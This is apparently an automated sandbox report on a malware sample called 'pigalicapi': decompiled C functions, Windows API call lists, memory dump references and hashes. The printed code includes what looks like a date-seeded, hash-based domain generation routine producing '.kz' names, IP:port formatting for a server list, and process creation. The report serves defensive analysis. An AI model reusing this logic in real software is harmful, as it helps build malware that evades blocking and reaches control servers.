                                                                                                                                                                                                                                                                                          0x0080b437
                                                                                                                                                                                                                                                                                          0x0080b445
                                                                                                                                                                                                                                                                                          0x0080b445
                                                                                                                                                                                                                                                                                          0x0080b413
                                                                                                                                                                                                                                                                                          0x0080b418
                                                                                                                                                                                                                                                                                          0x0080b418
                                                                                                                                                                                                                                                                                          0x0080b411

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,008086BD,?,?,?,?,?), ref: 0080B406
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,008086BD,?,?,?,?,?), ref: 0080B425
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?,?,?,008086BD,?,?,?,?,?), ref: 0080B437
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 805584807-0
                                                                                                                                                                                                                                                                                          • Opcode ID: db8b90389dd7c5e5be341503d0984c0df0326f233c307e236f8f6749349a08cc
                                                                                                                                                                                                                                                                                          • Instruction ID: 4cc42ec3633699a87e51fb9341900cdcb67a6b7f2ffe814aab06909059125011
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db8b90389dd7c5e5be341503d0984c0df0326f233c307e236f8f6749349a08cc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6018B336005249BDB2057ACEC89B85B759FB54720F058433F949EB192C371A95187A5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040092E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				struct _SYSTEMTIME _v28;
                                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				char _v172;
                                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                                                          					GetLocalTime( &_v28);
                                                                                                                                                                                                                                                                                          					_t46 = E040097E0(_v28.wMonth & 0x0000ffff, _v28.wYear & 0x0000ffff, _v28.wMonth & 0x0000ffff, _v28.wDay & 0x0000ffff);
                                                                                                                                                                                                                                                                                          					_t84 = _t83 + 0xc;
                                                                                                                                                                                                                                                                                          					_v12 = _t46 + _a12;
                                                                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                                                                          					while(_v32 < _a8) {
                                                                                                                                                                                                                                                                                          						E04007D20( &_v172,  &_v172, 0, 0x80);
                                                                                                                                                                                                                                                                                          						_t50 = E04008BB0( &_v12, 4,  &_v172, 0x80);
                                                                                                                                                                                                                                                                                          						_t86 = _t84 + 0x1c;
                                                                                                                                                                                                                                                                                          						_v40 = _t50;
                                                                                                                                                                                                                                                                                          						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                                          							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v12 = _v172;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                                          						E04009650( &_v172, _v40, _v32 * 0x28 + _a4, _v36);
                                                                                                                                                                                                                                                                                          						_t84 = _t86 + 0x10;
                                                                                                                                                                                                                                                                                          						lstrcatA(_v32 * 0x28 + _a4, ".kz");
                                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                          						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x040092e9
                                                                                                                                                                                                                                                                                          0x040092f4
                                                                                                                                                                                                                                                                                          0x04009308
                                                                                                                                                                                                                                                                                          0x0400931d
                                                                                                                                                                                                                                                                                          0x04009322
                                                                                                                                                                                                                                                                                          0x04009328
                                                                                                                                                                                                                                                                                          0x0400932b
                                                                                                                                                                                                                                                                                          0x0400933d
                                                                                                                                                                                                                                                                                          0x04009357
                                                                                                                                                                                                                                                                                          0x04009371
                                                                                                                                                                                                                                                                                          0x04009376
                                                                                                                                                                                                                                                                                          0x04009379
                                                                                                                                                                                                                                                                                          0x04009380
                                                                                                                                                                                                                                                                                          0x04009396
                                                                                                                                                                                                                                                                                          0x04009382
                                                                                                                                                                                                                                                                                          0x04009388
                                                                                                                                                                                                                                                                                          0x04009388
                                                                                                                                                                                                                                                                                          0x040093a8
                                                                                                                                                                                                                                                                                          0x040093c4
                                                                                                                                                                                                                                                                                          0x040093c9
                                                                                                                                                                                                                                                                                          0x040093db
                                                                                                                                                                                                                                                                                          0x040093e7
                                                                                                                                                                                                                                                                                          0x040093f0
                                                                                                                                                                                                                                                                                          0x0400933a
                                                                                                                                                                                                                                                                                          0x0400933a
                                                                                                                                                                                                                                                                                          0x0400933d
                                                                                                                                                                                                                                                                                          0x040093fe

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04009308
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,.kz), ref: 040093DB
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                                                                                                                          • String ID: .kz
                                                                                                                                                                                                                                                                                          • API String ID: 2740484991-4216035510
                                                                                                                                                                                                                                                                                          • Opcode ID: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
                                                                                                                                                                                                                                                                                          • Instruction ID: bb0d42d70b93f9fb2e2ab601979b3322a165a8cda29c6817b22e5740edda4972
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D310AB1E00209EBEF08DF94C885BEEB7B5EF58304F10C159E515B7281E678AA85CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02B52468
                                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 02B524B2
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.718905728.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2b51000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                                          • API String ID: 544645111-2766056989
                                                                                                                                                                                                                                                                                          • Opcode ID: 2a75a63bc52b7979a1521d091094293623d14a419708f62eec80947a1fa6f641
                                                                                                                                                                                                                                                                                          • Instruction ID: 39668f8d9fe3483c5646af576600689d99771d004cccba13a6ccfc0a9e72bbb2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a75a63bc52b7979a1521d091094293623d14a419708f62eec80947a1fa6f641
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC21C4B0A01219EBDB14CF98C984BAEBBB5FF44304F288599DE05AB240D774AB80DB55
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                          			E040078D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 >= _a8) {
                                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                                          					while(_v16 < _a8) {
                                                                                                                                                                                                                                                                                          						_t31 = E04007B70( &_v12, _v16 * 6 + _a4, 4);
                                                                                                                                                                                                                                                                                          						_push(_v12);
                                                                                                                                                                                                                                                                                          						L0400B1EC();
                                                                                                                                                                                                                                                                                          						_v20 = _t31;
                                                                                                                                                                                                                                                                                          						wnsprintfA(_v16 * 0x28 + _a12, 0x28, "%s:%u", _v20,  *(_a4 + 4 + _v16 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                                          						_t46 = _t46 + 0x20;
                                                                                                                                                                                                                                                                                          						_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v5 = 1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x040078d6
                                                                                                                                                                                                                                                                                          0x040078de
                                                                                                                                                                                                                                                                                          0x040078f8
                                                                                                                                                                                                                                                                                          0x0400790a
                                                                                                                                                                                                                                                                                          0x04007922
                                                                                                                                                                                                                                                                                          0x0400792d
                                                                                                                                                                                                                                                                                          0x0400792e
                                                                                                                                                                                                                                                                                          0x04007933
                                                                                                                                                                                                                                                                                          0x0400795a
                                                                                                                                                                                                                                                                                          0x04007960
                                                                                                                                                                                                                                                                                          0x04007907
                                                                                                                                                                                                                                                                                          0x04007907
                                                                                                                                                                                                                                                                                          0x04007965
                                                                                                                                                                                                                                                                                          0x04007965
                                                                                                                                                                                                                                                                                          0x0400796f

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: inet_ntoawnsprintf
                                                                                                                                                                                                                                                                                          • String ID: %s:%u
                                                                                                                                                                                                                                                                                          • API String ID: 890441721-1474915593
                                                                                                                                                                                                                                                                                          • Opcode ID: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
                                                                                                                                                                                                                                                                                          • Instruction ID: 46ead0e7315176c8e7c3a96679b7c8ac73bfa04a13e8ca702a559205f2d732b6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05115B71A04208ABEB08CF94C995BEDBBB4EB50308F04C29DE915BB280D379F645CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                                                                          			E0080D80E(int __ebx, intOrPtr* __esi) {
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                                                                                                          				int _t51;
                                                                                                                                                                                                                                                                                          				int _t55;
                                                                                                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                                                                          				intOrPtr _t71;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t72;
                                                                                                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t72 = __esi;
                                                                                                                                                                                                                                                                                          				_t55 = __ebx;
                                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                                          					_t57 =  *((intOrPtr*)(_t73 - 0x228));
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t72 + 0x118)) != 0xffffffff) {
                                                                                                                                                                                                                                                                                          						 *((char*)(_t73 - 0x110)) = 0;
                                                                                                                                                                                                                                                                                          						E00816820(_t73 - 0x10f, 0, 0x103);
                                                                                                                                                                                                                                                                                          						_t33 =  *((intOrPtr*)(_t73 - 0x228));
                                                                                                                                                                                                                                                                                          						_t76 = _t75 + 0xc;
                                                                                                                                                                                                                                                                                          						if(_t33 < 0 || _t33 >=  *((intOrPtr*)(_t72 + 4))) {
                                                                                                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							E00806040( *_t72 + _t55, _t73 - 0x110,  *((intOrPtr*)(_t72 + 0x118)));
                                                                                                                                                                                                                                                                                          							_push(_t73 - 0x110);
                                                                                                                                                                                                                                                                                          							E00804980(_t73 - 0x220, "&%i %s", _t70);
                                                                                                                                                                                                                                                                                          							_t75 = _t76 + 0x14;
                                                                                                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(_t57 < 0 || _t57 >=  *((intOrPtr*)(_t72 + 4))) {
                                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                                          							RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          							InsertMenuA( *(_t72 + 0x10), _t55, 0x400, 0xe110, _t72 + 0x14);
                                                                                                                                                                                                                                                                                          							_t65 =  *(_t72 + 0x10);
                                                                                                                                                                                                                                                                                          							EnableMenuItem( *(_t72 + 0x10), 0xe110, 1);
                                                                                                                                                                                                                                                                                          							 *(_t73 - 0x224) = 1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_push( *_t72 + _t55);
                                                                                                                                                                                                                                                                                          							E00804980(_t73 - 0x220, "&%i %s", _t70);
                                                                                                                                                                                                                                                                                          							_t75 = _t75 + 0xc;
                                                                                                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                                                                          					DeleteMenu( *(_t72 + 0x10),  *(_t73 - 0x224) + _t55, 0x400);
                                                                                                                                                                                                                                                                                          					_pop(_t71);
                                                                                                                                                                                                                                                                                          					_pop(_t56);
                                                                                                                                                                                                                                                                                          					return E008159E6(1, _t56,  *(_t73 - 4) ^ _t73, _t65, _t71, _t72);
                                                                                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                                                                                          					_t15 = _t70 + 0xe10f; // 0xe111
                                                                                                                                                                                                                                                                                          					_t65 =  *(_t72 + 0x10);
                                                                                                                                                                                                                                                                                          					InsertMenuA( *(_t72 + 0x10),  *(_t73 - 0x22c) + _t70 - 1, 0x400, _t15, _t73 - 0x220);
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t73 - 0x228)) =  *((intOrPtr*)(_t73 - 0x228)) - 1;
                                                                                                                                                                                                                                                                                          					_t51 =  *(_t73 - 0x224) + 1;
                                                                                                                                                                                                                                                                                          					_t55 = _t55 - 0x104;
                                                                                                                                                                                                                                                                                          					_t70 = _t70 + 1;
                                                                                                                                                                                                                                                                                          					 *(_t73 - 0x224) = _t51;
                                                                                                                                                                                                                                                                                          				} while (_t51 <  *((intOrPtr*)(_t73 - 0x230)));
                                                                                                                                                                                                                                                                                          				_t55 =  *(_t73 - 0x22c);
                                                                                                                                                                                                                                                                                          				goto L13;
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x0080d80e
                                                                                                                                                                                                                                                                                          0x0080d80e
                                                                                                                                                                                                                                                                                          0x0080d810
                                                                                                                                                                                                                                                                                          0x0080d810
                                                                                                                                                                                                                                                                                          0x0080d81d
                                                                                                                                                                                                                                                                                          0x0080d859
                                                                                                                                                                                                                                                                                          0x0080d860
                                                                                                                                                                                                                                                                                          0x0080d865
                                                                                                                                                                                                                                                                                          0x0080d86b
                                                                                                                                                                                                                                                                                          0x0080d870
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080d87f
                                                                                                                                                                                                                                                                                          0x0080d891
                                                                                                                                                                                                                                                                                          0x0080d89c
                                                                                                                                                                                                                                                                                          0x0080d8a9
                                                                                                                                                                                                                                                                                          0x0080d8ae
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080d8ae
                                                                                                                                                                                                                                                                                          0x0080d81f
                                                                                                                                                                                                                                                                                          0x0080d821
                                                                                                                                                                                                                                                                                          0x0080d907
                                                                                                                                                                                                                                                                                          0x0080d912
                                                                                                                                                                                                                                                                                          0x0080d92b
                                                                                                                                                                                                                                                                                          0x0080d931
                                                                                                                                                                                                                                                                                          0x0080d93c
                                                                                                                                                                                                                                                                                          0x0080d942
                                                                                                                                                                                                                                                                                          0x0080d830
                                                                                                                                                                                                                                                                                          0x0080d834
                                                                                                                                                                                                                                                                                          0x0080d841
                                                                                                                                                                                                                                                                                          0x0080d846
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080d846
                                                                                                                                                                                                                                                                                          0x0080d821
                                                                                                                                                                                                                                                                                          0x0080d94c
                                                                                                                                                                                                                                                                                          0x0080d95e
                                                                                                                                                                                                                                                                                          0x0080d967
                                                                                                                                                                                                                                                                                          0x0080d96f
                                                                                                                                                                                                                                                                                          0x0080d978
                                                                                                                                                                                                                                                                                          0x0080d8b1
                                                                                                                                                                                                                                                                                          0x0080d8be
                                                                                                                                                                                                                                                                                          0x0080d8c5
                                                                                                                                                                                                                                                                                          0x0080d8d3
                                                                                                                                                                                                                                                                                          0x0080d8df
                                                                                                                                                                                                                                                                                          0x0080d8e5
                                                                                                                                                                                                                                                                                          0x0080d8e6
                                                                                                                                                                                                                                                                                          0x0080d8ec
                                                                                                                                                                                                                                                                                          0x0080d8ed
                                                                                                                                                                                                                                                                                          0x0080d8f3
                                                                                                                                                                                                                                                                                          0x0080d8ff
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 0080D860
                                                                                                                                                                                                                                                                                          • InsertMenuA.USER32(?,?,00000400,0000E110,00000000), ref: 0080D8D3
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0080D912
                                                                                                                                                                                                                                                                                          • InsertMenuA.USER32(?,00000000,00000400,0000E110,?), ref: 0080D92B
                                                                                                                                                                                                                                                                                          • EnableMenuItem.USER32 ref: 0080D93C
                                                                                                                                                                                                                                                                                            • Part of subcall function 00804980: wvsprintfA.USER32(?,?,?), ref: 0080498C
                                                                                                                                                                                                                                                                                          • DeleteMenu.USER32(?,00000001,00000400), ref: 0080D95E
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Menu$Insert$DeleteEnableExceptionItemRaise_memsetwvsprintf
                                                                                                                                                                                                                                                                                          • String ID: &%i %s
                                                                                                                                                                                                                                                                                          • API String ID: 3482434871-915073524
                                                                                                                                                                                                                                                                                          • Opcode ID: b81b6691aa7dbbc2abcea49411f2733c02f8e687d0254eb13d0aeb3bbcfad4c6
                                                                                                                                                                                                                                                                                          • Instruction ID: 89d5f43bca8e9fdbe0b9be78cce0e9e1ee44d1f278c5e32840ea66ec21626b0a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b81b6691aa7dbbc2abcea49411f2733c02f8e687d0254eb13d0aeb3bbcfad4c6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E114271600219AFCB64DFA4ECC9EA9B7B4FB48314F1046ACE55AD7291D730AE85CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04001E60(CHAR* _a4) {
                                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v100;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					E04007D20(E04007D20( &_v24,  &_v24, 0, 0x10),  &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                                          					_v100.cb = 0x44;
                                                                                                                                                                                                                                                                                          					if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24) != 0) {
                                                                                                                                                                                                                                                                                          						CloseHandle(_v24.hThread);
                                                                                                                                                                                                                                                                                          						_v8 = _v24.hProcess;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                                          0x04001e66
                                                                                                                                                                                                                                                                                          0x04001e71
                                                                                                                                                                                                                                                                                          0x04001e8b
                                                                                                                                                                                                                                                                                          0x04001e93
                                                                                                                                                                                                                                                                                          0x04001ebc
                                                                                                                                                                                                                                                                                          0x04001ec2
                                                                                                                                                                                                                                                                                          0x04001ecb
                                                                                                                                                                                                                                                                                          0x04001ecb
                                                                                                                                                                                                                                                                                          0x04001ebc
                                                                                                                                                                                                                                                                                          0x04001ed4

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04001EB4
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04001EC2
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
